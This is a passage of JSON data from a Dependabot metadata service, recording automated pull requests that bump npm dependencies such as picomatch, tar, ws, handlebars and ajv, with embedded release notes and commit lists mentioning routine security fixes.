href=\"https://github.com/mde/ejs/commit/f47d7aedd51a983e4f73045f962b1209096b5800\"\u003e\u003ccode\u003ef47d7ae\u003c/code\u003e\u003c/a\u003e Update SECURITY.md\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mde/ejs/commit/828cea1687e3db459ab09d2f405d2444c7580b90\"\u003e\u003ccode\u003e828cea1\u003c/code\u003e\u003c/a\u003e Update SECURITY.md\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/mde/ejs/compare/v3.1.9...v3.1.10\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `picomatch` from 2.3.1 to 2.3.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/releases\"\u003epicomatch's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.3.2\u003c/h2\u003e\n\u003cp\u003eThis is a security release fixing several security relevant issues.\u003c/p\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: exception when glob pattern contains constructor by \u003ca href=\"https://github.com/Jason3S\"\u003e\u003ccode\u003e@​Jason3S\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/micromatch/picomatch/pull/144\"\u003emicromatch/picomatch#144\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-c2c7-rcm5-vvqj\"\u003eCVE-2026-33671\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/micromatch/picomatch/security/advisories/GHSA-3v7f-55p6-f55p\"\u003eCVE-2026-33672\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\"\u003ehttps://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/micromatch/picomatch/blob/master/CHANGELOG.md\"\u003epicomatch's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease history\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eAll notable changes to this project will be documented in this file.\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eThe format is based on \u003ca href=\"http://keepachangelog.com/en/1.0.0/\"\u003eKeep a Changelog\u003c/a\u003e\nand this project adheres to \u003ca href=\"http://semver.org/spec/v2.0.0.html\"\u003eSemantic Versioning\u003c/a\u003e.\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cul\u003e\n\u003cli\u003eChangelogs are for humans, not machines.\u003c/li\u003e\n\u003cli\u003eThere should be an entry for every single version.\u003c/li\u003e\n\u003cli\u003eThe same types of changes should be grouped.\u003c/li\u003e\n\u003cli\u003eVersions and sections should be linkable.\u003c/li\u003e\n\u003cli\u003eThe latest version comes first.\u003c/li\u003e\n\u003cli\u003eThe release date of each versions is displayed.\u003c/li\u003e\n\u003cli\u003eMention whether you follow Semantic Versioning.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cp\u003eChangelog entries are classified using the following labels \u003cem\u003e(from \u003ca href=\"http://keepachangelog.com/\"\u003ekeep-a-changelog\u003c/a\u003e\u003c/em\u003e):\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eAdded\u003c/code\u003e for new features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eChanged\u003c/code\u003e for changes in existing functionality.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eDeprecated\u003c/code\u003e for soon-to-be removed features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eRemoved\u003c/code\u003e for now removed features.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eFixed\u003c/code\u003e for any bug fixes.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eSecurity\u003c/code\u003e in case of vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003e4.0.0 (2024-02-07)\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix bad text values in parse \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/126\"\u003e#126\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/connor4312\"\u003e\u003ccode\u003e@​connor4312\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove process global to work outside of node \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/129\"\u003e#129\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/styfle\"\u003e\u003ccode\u003e@​styfle\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd sideEffects to package.json \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/128\"\u003e#128\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/frandiox\"\u003e\u003ccode\u003e@​frandiox\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemoved \u003ccode\u003eos\u003c/code\u003e, make compatible browser environment. See \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/124\"\u003e#124\u003c/a\u003e, thanks to \u003ca href=\"https://github.com/gwsbhqt\"\u003e\u003ccode\u003e@​gwsbhqt\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.0.1\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/81cba8d4b767cab3cb29d26eb4f691eed75b73b2\"\u003e\u003ccode\u003e81cba8d\u003c/code\u003e\u003c/a\u003e Publish 2.3.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/fc1f6b69006e9435caf8fb40d8aff378bc0b7bce\"\u003e\u003ccode\u003efc1f6b6\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/eec17aee5428a7249e9ca5adbb8a0d28fa29619b\"\u003e\u003ccode\u003eeec17ae\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/78f8ca4362d9e66cadea97b93e292f10096452ed\"\u003e\u003ccode\u003e78f8ca4\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/156\"\u003e#156\u003c/a\u003e from micromatch/backport-144\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/micromatch/picomatch/commit/3f4f10eaa65bf3a52e8f2999674cd27e11fa3c9b\"\u003e\u003ccode\u003e3f4f10e\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/micromatch/picomatch/issues/144\"\u003e#144\u003c/a\u003e from Jason3S/jdent-object-properties\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/micromatch/picomatch/compare/2.3.1...2.3.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `yauzl` from 3.2.0 to 3.2.1\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thejoshwolfe/yauzl/commit/c4695215b05c6adffda613b9051a2a85429b33fe\"\u003e\u003ccode\u003ec469521\u003c/code\u003e\u003c/a\u003e version 3.2.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thejoshwolfe/yauzl/commit/00c561b8cf1ff92e076f7087ac6287e510d4af54\"\u003e\u003ccode\u003e00c561b\u003c/code\u003e\u003c/a\u003e fix bounds checking logic on NtfsTimestamp\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thejoshwolfe/yauzl/commit/277b294d23fc1c10ff772fa5e858830ca79d9892\"\u003e\u003ccode\u003e277b294\u003c/code\u003e\u003c/a\u003e comment\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thejoshwolfe/yauzl/commit/de292f220268473eb20aef64b0a77faa9d004d9a\"\u003e\u003ccode\u003ede292f2\u003c/code\u003e\u003c/a\u003e streamed zip file test\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thejoshwolfe/yauzl/commit/e00f13978fe284d60199014f567fb9efc4df8499\"\u003e\u003ccode\u003ee00f139\u003c/code\u003e\u003c/a\u003e truncate long test file names for eCryptfs compatibility\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thejoshwolfe/yauzl/commit/d98e05247dc7b95f5f0bcd336a81aca6d8563b95\"\u003e\u003ccode\u003ed98e052\u003c/code\u003e\u003c/a\u003e fix name of Info-ZIP\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/thejoshwolfe/yauzl/commit/a8951a29884b9506b695575037bee608b09592cc\"\u003e\u003ccode\u003ea8951a2\u003c/code\u003e\u003c/a\u003e update readme\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/thejoshwolfe/yauzl/compare/3.2.0...3.2.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `glob` from 10.4.5 to 10.5.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/56774ef73b495eb0b17cdd0f42921f5ef62297c1\"\u003e\u003ccode\u003e56774ef\u003c/code\u003e\u003c/a\u003e 10.5.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f\"\u003e\u003ccode\u003e1e4e297\u003c/code\u003e\u003c/a\u003e bin: Do not expose filenames to shell expansion\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/isaacs/node-glob/compare/v10.4.5...v10.5.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `tar` from 7.4.3 to 7.5.13\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/isaacs/node-tar/blob/main/CHANGELOG.md\"\u003etar's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eChangelog\u003c/h1\u003e\n\u003ch2\u003e7.5\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003ezstd\u003c/code\u003e compression support.\u003c/li\u003e\n\u003cli\u003eConsistent TOCTOU behavior in sync t.list\u003c/li\u003e\n\u003cli\u003eOnly read from ustar block if not specified in Pax\u003c/li\u003e\n\u003cli\u003eFix sync tar.list when file size reduces while reading\u003c/li\u003e\n\u003cli\u003eSanitize absolute linkpaths properly\u003c/li\u003e\n\u003cli\u003ePrevent writing hardlink entries to the archive ahead of their\nfile target\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e7.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecate \u003ccode\u003eonentry\u003c/code\u003e in favor of \u003ccode\u003eonReadEntry\u003c/code\u003e for clarity.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e7.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003eonWriteEntry\u003c/code\u003e option\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e7.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDRY the command definitions into a single \u003ccode\u003emakeCommand\u003c/code\u003e method,\nand update the type signatures to more appropriately infer the\nreturn type from the options and arguments provided.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e7.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate minipass to v7.1.0\u003c/li\u003e\n\u003cli\u003eUpdate the type definitions of \u003ccode\u003ewrite()\u003c/code\u003e and \u003ccode\u003eend()\u003c/code\u003e methods on\n\u003ccode\u003eUnpack\u003c/code\u003e and \u003ccode\u003eParser\u003c/code\u003e classes to be compatible with the\nNodeJS.WritableStream type in the latest versions of\n\u003ccode\u003e@types/node\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e7.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDrop support for node \u0026lt;18\u003c/li\u003e\n\u003cli\u003eRewrite in TypeScript, provide ESM and CommonJS hybrid\ninterface\u003c/li\u003e\n\u003cli\u003eAdd tree-shake friendly exports, like \u003ccode\u003eimport('tar/create')\u003c/code\u003e\nand \u003ccode\u003eimport('tar/read-entry')\u003c/code\u003e to get individual functions or\nclasses.\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003echmod\u003c/code\u003e option that defaults to false, and deprecate\n\u003ccode\u003enoChmod\u003c/code\u003e. That is, reverse the default option regarding\nexplicitly setting file system modes to match tar entry\nsettings.\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003eprocessUmask\u003c/code\u003e option to avoid having to call\n\u003ccode\u003eprocess.umask()\u003c/code\u003e when \u003ccode\u003echmod: true\u003c/code\u003e (or \u003ccode\u003enoChmod: false\u003c/code\u003e) is\nset.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/d6611ae951056addb77c6e11baf7bcc9d7648e46\"\u003e\u003ccode\u003ed6611ae\u003c/code\u003e\u003c/a\u003e 7.5.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/119c401f4f7efbeb112d28f9dfc9c489674c9a79\"\u003e\u003ccode\u003e119c401\u003c/code\u003e\u003c/a\u003e fix(extract): prevent raced symlink writes outside cwd\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/2a294d3fbb24c18dc80f31059f49dd9af15653fe\"\u003e\u003ccode\u003e2a294d3\u003c/code\u003e\u003c/a\u003e 7.5.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/01082a42c3256ca6054f9627911cce4dbfe00d92\"\u003e\u003ccode\u003e01082a4\u003c/code\u003e\u003c/a\u003e fix: reject top promise on floating addFilesAsync rejections\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/dd1c36ab7acff26e5a34935d17f27a45bb088db3\"\u003e\u003ccode\u003edd1c36a\u003c/code\u003e\u003c/a\u003e linting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/35a1ffe73eb4aa05cd2613f8fdcfb4c9c9ed59f9\"\u003e\u003ccode\u003e35a1ffe\u003c/code\u003e\u003c/a\u003e doc: more clarity in security warning\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/bf776f673164215074b62749e0fe80e5834588f4\"\u003e\u003ccode\u003ebf776f6\u003c/code\u003e\u003c/a\u003e 7.5.11\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/f48b5fa3b7985ddab96dc0f2125a4ffc9911b6ad\"\u003e\u003ccode\u003ef48b5fa\u003c/code\u003e\u003c/a\u003e prevent escaping symlinks with drive-relative paths\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/97cff15d3539a37a4095eb3d287147d9d77c2dc3\"\u003e\u003ccode\u003e97cff15\u003c/code\u003e\u003c/a\u003e docs: more security info\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-tar/commit/2b72abc1d47c3570e1ad95c9ab557fc4c2e6e4b1\"\u003e\u003ccode\u003e2b72abc\u003c/code\u003e\u003c/a\u003e 7.5.10\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/isaacs/node-tar/compare/v7.4.3...v7.5.13\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~isaacs\"\u003eisaacs\u003c/a\u003e, a new releaser for tar since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version adds \u003ccode\u003eprepare\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `ws` from 7.5.8 to 7.5.10\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/websockets/ws/releases\"\u003ews's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e7.5.10\u003c/h2\u003e\n\u003ch1\u003eBug fixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eBackported e55e5106 to the 7.x release line (22c28763).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e7.5.9\u003c/h2\u003e\n\u003ch1\u003eBug fixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eBackported bc8bd34e to the 7.x release line (0435e6e1).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/d962d70649e393841ee1ed726a8f7ffbe90d0c06\"\u003e\u003ccode\u003ed962d70\u003c/code\u003e\u003c/a\u003e [dist] 7.5.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f\"\u003e\u003ccode\u003e22c2876\u003c/code\u003e\u003c/a\u003e [security] Fix crash when the Upgrade header cannot be read (\u003ca href=\"https://redirect.github.com/websockets/ws/issues/2231\"\u003e#2231\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/8a78f8770618cc5a1ade485a7445cb6d6f46e2f2\"\u003e\u003ccode\u003e8a78f87\u003c/code\u003e\u003c/a\u003e [dist] 7.5.9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/websockets/ws/commit/0435e6e12b8d38992cf0651cb8605dde2294bd25\"\u003e\u003ccode\u003e0435e6e\u003c/code\u003e\u003c/a\u003e [security] Fix same host check for ws+unix: redirects\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/websockets/ws/compare/7.5.8...7.5.10\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `handlebars` from 4.7.8 to 4.7.9\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/handlebars-lang/handlebars.js/releases\"\u003ehandlebars's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.7.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix: enable shell mode for spawn to resolve Windows EINVAL issue - e0137c2\u003c/li\u003e\n\u003cli\u003efix type \u0026quot;RuntimeOptions\u0026quot; also accepting string partials - eab...\n\n_Description has been truncated_","html_url":"https://github.com/preechapon250/strapi/pull/23","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/preechapon250%2Fstrapi/issues/23","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/23/packages"}},{"old_version":"6.1.2","new_version":"removed","update_type":null,"path":null,"pr_created_at":"2026-03-31T16:29:47.000Z","version_change":"6.1.2 → removed","issue":{"uuid":"4180617021","node_id":"PR_kwDOLinjCM7PAQAk","number":1232,"state":"closed","title":"chore(deps): bump the npm_and_yarn group across 2 directories with 23 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-04-01T08:10:45.000Z","author_association":null,"state_reason":null,"created_at":"2026-03-31T16:29:47.000Z","updated_at":"2026-04-01T08:10:47.000Z","time_to_close":56458,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): bump","group_name":"npm_and_yarn","update_count":23,"packages":[{"name":"ajv","old_version":"6.12.6","new_version":"6.14.0","repository_url":"https://github.com/ajv-validator/ajv"},{"name":"brace-expansion","old_version":"1.1.11","new_version":"1.1.13","repository_url":"https://github.com/juliangruber/brace-expansion"},{"name":"minimatch","old_version":"3.1.2","new_version":"3.1.5","repository_url":"https://github.com/isaacs/minimatch"},{"name":"@octokit/plugin-paginate-rest","old_version":"6.1.2","new_version":"removed","repository_url":"https://github.com/octokit/plugin-paginate-rest.js"},{"name":"diff","old_version":"5.2.0","new_version":"5.2.2","repository_url":"https://github.com/kpdecker/jsdiff"},{"name":"flatted","old_version":"3.3.1","new_version":"3.4.2","repository_url":"https://github.com/WebReflection/flatted"},{"name":"picomatch","old_version":"2.3.1","new_version":"2.3.2","repository_url":"https://github.com/micromatch/picomatch"},{"name":"yaml","old_version":"2.6.0","new_version":"2.8.3","repository_url":"https://github.com/eemeli/yaml"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 8 updates in the /src/praisonai directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [ajv](https://github.com/ajv-validator/ajv) | `6.12.6` | `6.14.0` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.11` | `1.1.13` |\n| [minimatch](https://github.com/isaacs/minimatch) | `3.1.2` | `3.1.5` |\n| [@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `6.1.2` | `removed` |\n| [diff](https://github.com/kpdecker/jsdiff) | `5.2.0` | `5.2.2` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.3.1` | `3.4.2` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.1` | `2.3.2` |\n| [yaml](https://github.com/eemeli/yaml) | `2.6.0` | `2.8.3` |\n\nBumps the npm_and_yarn group with 13 updates in the /src/praisonai-ts directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [ajv](https://github.com/ajv-validator/ajv) | `6.12.6` | `6.14.0` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.11` | `1.1.13` |\n| [minimatch](https://github.com/isaacs/minimatch) | `3.1.2` | `3.1.5` |\n| [body-parser](https://github.com/expressjs/body-parser) | `2.2.0` | `2.2.2` |\n| [diff](https://github.com/kpdecker/jsdiff) | `4.0.2` | `4.0.4` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.3.3` | `3.4.2` |\n| [js-yaml](https://github.com/nodeca/js-yaml) | `3.14.1` | `3.14.2` |\n| [path-to-regexp](https://github.com/pillarjs/path-to-regexp) | `8.2.0` | `8.4.1` |\n| [picomatch](https://github.com/micromatch/picomatch) | `2.3.1` | `2.3.2` |\n| [qs](https://github.com/ljharb/qs) | `6.14.0` | `6.15.0` |\n| [@modelcontextprotocol/sdk](https://github.com/modelcontextprotocol/typescript-sdk) | `1.12.1` | `1.26.0` |\n| [fast-xml-parser](https://github.com/NaturalIntelligence/fast-xml-parser) | `4.5.3` | `5.5.7` |\n| [@eslint/plugin-kit](https://github.com/eslint/rewrite/tree/HEAD/packages/plugin-kit) | `0.3.1` | `0.3.5` |\n\n\nUpdates `ajv` from 6.12.6 to 6.14.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/e3af0a723b4b7ad86eff43be355c706d31e0e915\"\u003e\u003ccode\u003ee3af0a7\u003c/code\u003e\u003c/a\u003e 6.14.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/b552ed66191eb338498df3196065c777e3bb71f2\"\u003e\u003ccode\u003eb552ed6\u003c/code\u003e\u003c/a\u003e add regExp option to address $data exploit via a regular expression (CVE-2025...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/72f228665859eed5e2be3a66f8c4a7aff6b34dcf\"\u003e\u003ccode\u003e72f2286\u003c/code\u003e\u003c/a\u003e docs: update v7 info\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/231e52b3bca62559202b95e5fb5cee02145b226a\"\u003e\u003ccode\u003e231e52b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/ajv-validator/ajv/issues/1320\"\u003e#1320\u003c/a\u003e from philsturgeon/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/d3475fc20416c33fe030c8aa3b09fa411f325bbd\"\u003e\u003ccode\u003ed3475fc\u003c/code\u003e\u003c/a\u003e Add spectral, an AJV util from a sponsor\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/413afe01f518ea74d1740a7cb211df787c585544\"\u003e\u003ccode\u003e413afe0\u003c/code\u003e\u003c/a\u003e docs: v7.0.0-beta.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ajv-validator/ajv/commit/11e997bda2f3eecb445c1e5a07d96ef7e81c5f5d\"\u003e\u003ccode\u003e11e997b\u003c/code\u003e\u003c/a\u003e update readme for v7\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/ajv-validator/ajv/compare/v6.12.6...v6.14.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `brace-expansion` from 1.1.11 to 1.1.13\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/juliangruber/brace-expansion/releases\"\u003ebrace-expansion's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.1.12\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003epkg: publish on tag 1.x  c460dbd\u003c/li\u003e\n\u003cli\u003efmt  ccb8ac6\u003c/li\u003e\n\u003cli\u003eFix potential ReDoS Vulnerability or Inefficient Regular Expression (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/65\"\u003e#65\u003c/a\u003e)  c3c73c8\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\"\u003ehttps://github.com/juliangruber/brace-expansion/compare/v1.1.11...v1.1.12\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/6c353caf23beb9644f858eb3fe38d43a68b82898\"\u003e\u003ccode\u003e6c353ca\u003c/code\u003e\u003c/a\u003e 1.1.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/juliangruber/brace-expansion/commit/7fd684f89fdde3549563d0a6522226a9189472a2\"\u003e\u003ccode\u003e7fd684f\u003c/code\u003e\u003c/a\u003e Backport fix for GHSA-f886-m6hf-6m8v (\u003ca href=\"https://redirect.github.com/juliangruber/brace-expansion/issues/95\"\u003e#95\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca 